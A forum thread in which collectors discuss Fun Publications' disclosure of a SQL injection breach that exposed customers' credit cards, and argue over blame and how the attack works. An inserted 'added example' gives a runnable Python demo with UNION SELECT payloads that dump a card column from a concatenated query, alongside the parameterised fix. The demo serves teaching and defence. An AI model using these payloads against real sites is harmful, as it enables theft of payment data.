Fun Publications sent out an email with further information about the recent credit card fraud issue affecting them:
Here is the latest update on the credit card security investigation. The firm we have hired to analyze our former ecommerce server and software has preliminarily determined that we did incur a SQL injection code attack sometime before Christmas. Our ISP did have a commercial product installed that was supposed to defeat these types of attacks, but apparently it failed.
This allowed the hackers access to our order information. While it is still unknown exactly what data they were able to harvest (investigation continues) we need to assume that they were able to extract all of our order information. The security firm thinks that this attack has allowed the hackers to come back periodically and harvest more information. However, once the old server was taken out of service (around February 21st) there was nothing left for them to access.
Once this information was stolen (no matter if it was back before Christmas), there is no time frame as to when the thieves may sell or try to use the information to purport credit card theft.
What does this mean to me?
We are asking again that anyone who has used a credit card in our old online systems in the past year (NOT THE NEW STORE) to get your card replaced immediately. If you have done this already, there is no action required on your part.
We apologize for the inconvenience; we know this whole thing is a pain, but it is better to replace the cards than have to deal with any issues that may result from this theft of data. Even though the amount of fraud has greatly declined, we are still receiving a customer report every few days of someone else (who hasn't replaced their cards) getting hit. We strongly encourage you to take this step immediately if you have not done so already. Again, this DOES NOT pertain to any cards that have been used in the new store.
What is the plan?
We are still working on all of the issues and are several weeks away from a final resolution. Our new store is currently offline while we complete the entries and audit the data from the renewals we received last week. Just to reiterate, this new store is a totally different piece of software, at a totally different hosting site. There are hundreds of other retailers using this same software as it is hosted by the software creators.
We hope to have the store online and registration system back online sometime next week. When the store comes back online, we will be adding products slowly so it will take some time to have everything back in the store.
Thank you for your patience and support during this trying issue.
Brian
XJunky
http://www.tfw2005.com/boards/trans…dom-card-issues-2-2012-a-112.html#post7462519
Kaijumaster
As are we.
Alucard77
OK, defender of FP…. here is the problem:
1- They are blaming others.
2- Your job is to defend your database. Security has many layers. So saying your ISP was responsible shows that there were no layers after the ISP layer. There was protection they themselves could have had in place to make sure if the ISP failed, this wouldn't affect them.
3- Let's also not forget the data stored in said database was against their contract with VISA/Mastercard and left them non-compliant.
You do realize that every company that the ISP is on would then be affected and hacked, right? You know how many companies an ISP can have, right?
So my problem is they are still blaming others, which goes to show the negligence is continuing.
Do I need to post the comedy of errors (21 at last count). I am tired of making this argument. But if they made 1 or 2 mistakes then fine. They made 21 mistakes in the process. So guess what, they are open for criticism.
Here is the thing I don't understand, why are you defending them? You think they need defending?
Once they show ownership and the fact that they are moving forward, I back off. But they haven't shown that yet. I think that has a right to be said. Sorry if as a fandom I think we should have better than this crap.
Kaijumaster
You're not gonna get through. The same people in this place blaming FP are the same people who are spamming every thread they can against FP whether the thread has anything to do with this issue or not. The same people who want FP's head on a platter but never make any comments about wanting to catch the people who actually STOLE the information.
Regardless like someone just said, this is turning right back into the cycle of hate the old thread was. FP has sent out a new piece of news…it has been discussed. It's time to lock the thread.
G.B. Blackrock
And, so what? IF FP did have (or believed they have) this, why shouldn't they say so? Why does everything they say have to be attributed to them being evil and horrible? Even if, so far as they know, it happens to be the truth?
Alucard77
This is the part I am reading:
So basically blaming their ISP.
Lumpy
you must be reading something i'm not, because i saw that they said they did have an attack, and it appears to be in conjunction with their old server and software… that, to me, reads as them saying they are guilty… it seems like there was fault on FP's part, as well as whoever told them they were secure…
hahahaha….
Computron34
Checks in thread…….
same as all the other FunPub threads……..
leaves thread.
Alucard77
Well, do we? They are still blaming someone else besides themselves. So they are still saying they aren't guilty. As usual.
icefox
Me too
My card was hit yesterday, called up and getting a replacement.
Tripredacus
I now see how you are looking at it, which is correct, but that is not how SQLi exploits work. They work by using the web application itself to get the data. The application has the account to access the data already, and if there aren't any validation rules on page actions, you can process commands through the application.
Your code example is not that of an application, but a standard connect to get data to display on the page.
Lumpy
uh… really? no one has their toy… and even if you joined 8 weeks ago, there's no way they'd send the figure to you before the membership cutoff date…
why would that bother you? if you've not cancelled your card at this point, and know about this, then you're taking a risk… if you were living under a rock, or not part of an online forum, then that would give you some leeway.
well, see that's the problem… if you don't report it, then they can say stuff like "reports have gone down" because no one is reporting to them…
I'm sure Hasbro has been involved and knows what's going on, and will probably be looking into what needs to happen for this to not happen again…
yeah, the fact that they had access for months is pretty crazy… i really dislike that, a lot.
well, no, see we assumed a lot of that… now we have full confirmation from their investigation… you know, it's that whole innocent until proven guilty thing…
yeah, i hope those arrive soon, i wonder why they didn't just say something up front weeks ago, when they knew the other toys wouldn't be here on time… unless they were supposed to be on an earlier shipment and something happened out of their control. but even then, it would've been nice to get a heads up.
that may be exactly why they won't take Paypal yet… if you got a figure with 2 right guns, and filed a complaint, even if FP fixed it, Paypal could still give you back all your money… which i personally think is bullshit, because if the problem is fixed, you shouldn't get money back…
Grandum
pfft, they'll still insist on faxing things in in 10 years from now.
Alucard77
Well, if this is the wave of the future, I am sure TFCC will do what they normally do and wait 10 years to implement it.
Composite Ghost
I think you're totally right. They just can't say that's the reason because it would be like saying, yeah, we kind of screw up a lot. So they're sticking with the company line about those excessive fees.
I was at Home Depot last week and they now have the option of paying with Paypal right there on the pin pad. It's the way of the future, TFCC, time to get with the program. Clean up your act and you won't have to worry about all those claims.
Grandum
I'm sorry, but no, that is just wrong on so many levels. You can't write any pages with SQL, that's just not how it works – in order to do that you need to rely on another programming language.
And since you can't print the information you have to rely on whatever templates are already set up.
Also, let's not get ahead of ourselves. Yes, you can manipulate data in a database IF you have SQL access, but that's not really the case of SQL injection, now is it?
The way it works is that:
1. The server sets up a connection to the database
2. It takes what it thinks is information about what is supposed to be entered into the database
3. The server updates the database
4. The server closes the connection
So, with SQL injection you never get the password/username for the database, so let's separate full SQL access from SQL injection, the two are quite different.
Gah, I guess I will have to show you what I mean – I'll show you a little bit of classic ASP code that can be SQL injected…I chose ASP as that is on a very basic level and can illustrate what I mean:
Here the connection is made by the server – note that 4 important things here are never revealed to the user – the name of the database, the table name, password and the username, all of which would be needed to get access to a database.
Here is what leaves it open to SQL injection: the information is not filtered before being written to the database. What you want here is some ASP code substituting some SQL characters like " and ; – it's just piss poor programming to not substitute those characters.
and here we see the system updating the information.
Now, in presenting the information, you would do it like this:
here you have the system setting up the connection to the database
here you have the system loading the data into ASP variables, based on who is logged in
here you have the system displaying the information.
here you have the system closing the connection
In none of these steps do you actually have any way of telling the system to display anything but the two fields chosen. Hypothetically, you could log in as another user, provided you've lucked out and guessed your way to the table name, but that would only affect the "to" and "by" field data; there would be no way to display the information from the third column "credit_card".
So, no – just no. you are wrong, plain and simple.
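Added example, not code from the thread or from Fun Publications' store: the two posts above (Tripredacus on the application running the attacker's commands over its own database account, and Grandum's "display two fields for the logged-in user" page) describe the same vulnerable pattern, so here it is as a runnable script. The ASP/database stack is assumed; this uses Python's built-in sqlite3 with a constructed `orders` table (column and user names are made up). The point it shows: the page only ever selects the "to" and "by" fields, yet a `UNION SELECT` in the unfiltered login name pulls the `credit_card` column through that same page, and the table name does not have to be guessed because the schema catalogue can be read the same way (`sqlite_master` here; other engines expose `INFORMATION_SCHEMA` or similar). The parameterised version shows the fix: the input is bound as a value and can never change the query's shape.

```python
import sqlite3

# Constructed sample rows standing in for the hypothetical "orders" table.
# Columns: owner (login name), to_name, by_name, credit_card.
SAMPLE_ORDERS = [
    ("alice", "Alice A.", "Fun Publications", "4111111111111111"),
    ("bob", "Bob B.", "Fun Publications", "5500000000000004"),
]


def make_db():
    """In-memory stand-in for the store's database, populated with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (owner TEXT, to_name TEXT, by_name TEXT, credit_card TEXT)"
    )
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", SAMPLE_ORDERS)
    conn.commit()
    return conn


def show_order_vulnerable(conn, owner):
    """The 'show two fields for the logged-in user' page built by string
    concatenation, the classic-ASP pattern the thread describes. The SQL is
    assembled from the user-controlled value, so that value can rewrite the query.
    The application's own connection runs it; the attacker never needs the
    database username or password."""
    sql = "SELECT to_name, by_name FROM orders WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def show_order_safe(conn, owner):
    """Same page with a bound parameter: the value is sent separately from the
    query text, so quotes, comment markers or UNION in it are just characters."""
    sql = "SELECT to_name, by_name FROM orders WHERE owner = ?"
    return conn.execute(sql, (owner,)).fetchall()


# Constructed attacker inputs, typed into the login-name field.
# 1) Read the schema catalogue to learn table and column names (no guessing).
LIST_SCHEMA = "nobody' UNION SELECT name, sql FROM sqlite_master --"
# 2) Pull the third column out through the page that only "displays two fields".
#    UNION needs the same column count as the original SELECT, hence two columns.
DUMP_CARDS = "nobody' UNION SELECT owner, credit_card FROM orders --"


def run_demo():
    """Return what each page variant shows for a normal user and for each payload."""
    conn = make_db()
    return {
        "normal": show_order_vulnerable(conn, "alice"),
        "schema_leak": show_order_vulnerable(conn, LIST_SCHEMA),
        "card_leak": show_order_vulnerable(conn, DUMP_CARDS),
        "safe_normal": show_order_safe(conn, "alice"),
        "safe_payload": show_order_safe(conn, DUMP_CARDS),
    }


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(name, rows)
```

The `--` turns the page's closing quote into a comment, which is why the concatenated query still parses. Stripping `"` and `;` as the post suggests does not stop this payload (it uses neither); doubling `'` would stop this string-context case but not a numeric parameter such as `order_id=5 UNION SELECT ...`, which is why bound parameters rather than character substitution are the standard fix.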
03Mach1
Not to mention paypal ALWAYS sides with the buyer in a dispute. And given FP's history, there would be a lot of claims. From missing/incorrect pieces to never received toys.
Composite Ghost
A while back someone asked Pete if they would consider using Paypal and he said nothing is off the table. I guess Paypal is off the table again. I don't think Brian Savage likes having people question his decisions.
Waverider
Which is mind boggling to me. I used to work at a NOC for a multi-million dollar company that deals with physical and online retail. We maintained and monitored 3 large data centers and over 500 remote servers.
I know you can't really compare a large corporation to a small business like FP. But WTF!? One of the most important things in business is to maintain and protect the DB. FP failed at both in all levels.
airfox
Not to defend Fun Publications, whose badly designed and maintained e-commerce store caused many of us to get our credit card and personal information stolen, but they had already apologized as far back as February 24th:
That's what I'm guessing, from the wording on Brian's email.
Why? There's no crime in the U.S.?
(People complain about FunPub's mishandling of international members, and yet …)
Not so sure. First of all, I doubt they have the access logs from their web servers as far back as December, and most likely the attackers used an anonymizer service.
Exactly. If you have SQL access, you're already in the database, so you can pretty much read and modify it depending on the access granted to the database user used by the web server to connect to the database. ASP or PHP are in an upper layer, and are actually only meant to help you write the pages in a more friendly language.
New information from their email:
1) The method used to hack the store.
2) The timeframe.
To me, that's pretty important information; it lets me know they're following this through.
I don't think the compromised system is in any way tied to their points of sale at BotCon 2010; those POS should go over a landline directly to the bank, and only store information for a couple of hours (worst case scenario).
-airfox